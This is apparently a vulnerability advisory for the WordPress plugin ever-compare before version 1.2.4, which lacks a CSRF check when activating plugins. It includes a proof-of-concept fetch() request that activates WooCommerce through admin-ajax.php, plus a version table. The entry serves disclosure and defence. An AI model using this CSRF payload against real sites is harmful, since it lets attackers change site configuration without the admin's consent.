The plugin does not have CSRF check when activating plugins, which could allow attackers to make logged in admins activate arbitrary plugins present on the blog via a CSRF attack
activate woocommerce plugin exploit: fetch(‘http://localhost/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=ever-compare_ajax_plugin_activation&location;=woocommerce/woocommerce.php’, redirect: ‘follow’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));
CPE | Name | Operator | Version |
---|---|---|---|
ever-compare | lt | 1.2.4 |